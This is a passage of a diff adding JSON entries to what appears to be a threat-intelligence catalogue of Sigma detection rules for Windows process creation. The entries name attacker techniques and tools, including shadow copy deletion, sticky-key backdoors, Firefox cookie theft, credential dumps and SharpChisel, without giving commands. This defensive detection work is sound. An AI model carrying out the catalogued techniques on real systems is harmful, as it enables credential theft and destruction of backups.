reasons." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a windows service to be stopped", + "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", + "value": "Stop Windows Service", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_service_stop.yml", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Administrator shutting down the service due to upgrade or removal purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of executionpolicy option to set insecure policies", + "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "value": "Change PowerShell Policies to an Insecure Level", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/11/01", + "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/09/20", + "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "value": "Shadow Copies Access via Symlink", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_access_symlink.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", + "value": "Shadow Copies Creation Using Operating Systems Utilities", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_creation.yml", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies deletion using operating systems utilities", + "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "value": "Shadow Copies Deletion Using Operating Systems Utilities", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/Neo23x0/Raccine#the-process", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_shadow_copies_deletion.yml", + "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "value": "SharpUp PrivEsc Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/SharpUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_sharpup.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "value": "SharpChisel Usage", + "meta": { + "refs": [ + "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "creation_date": "2022/09/05", + "filename": "proc_creation_win_sharp_chisel_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/17", + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program", + "meta": { + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ], + "creation_date": "2018/04/06", + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects SILENTTRINITY stager use", + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "author": "Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ], + "creation_date": "2020/10/16", + "filename": "proc_creation_win_software_discovery.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_soundrec_audio_capture.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration", + "meta": { + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2018/11/14", + "filename": "proc_creation_win_spn_enum.yml", + "author": "Markus Neis, keepwatch", + "level": "medium", + "falsepositive": [ + "Administrator Activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_sqlite_firefox_cookies.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage", + "meta": { + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ], + "creation_date": "2018/03/15", + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "value": "Sticky-Key Backdoor Copy Cmd.exe", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ], + "creation_date": "2020/02/18", + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe", + "meta": { + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/21", + "filename": "proc_creation_win_stordiag_execution.yml", + "author": "Austin Songer (@austinsonger)", + "level": "high", + "falsepositive": [ + "Legitimate usage of stordiag.exe." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/16", + "filename": "proc_creation_win_susp_16bit_application.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage", + "meta": { + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", + "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_susp_7z.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Command line parameter combinations that contain all included strings" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "value": "7Zip Compressing Dump Files", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_susp_7zip_dmp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add User to Local Administrators", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_susp_add_local_admin.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ], + "creation_date": "2021/12/06", + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration", + "meta": { + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection", + "meta": { + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ], + "creation_date": "2021/02/02", + "filename": "proc_creation_win_susp_adfind_usage.yml", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", + "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", + "value": "Suspicious Execution of Adidnsdump", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_adidnsdump.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AdvancedRun utility", + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/20", + "filename": "proc_creation_win_susp_advancedrun.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/20", + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/05/20", + "filename": "proc_creation_win_susp_base64_invoke.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_susp_base64_load.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ], + "creation_date": "2019/02/07", + "filename": "proc_creation_win_susp_bcdedit.yml", + "author": "@neu5ron", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "uuid": 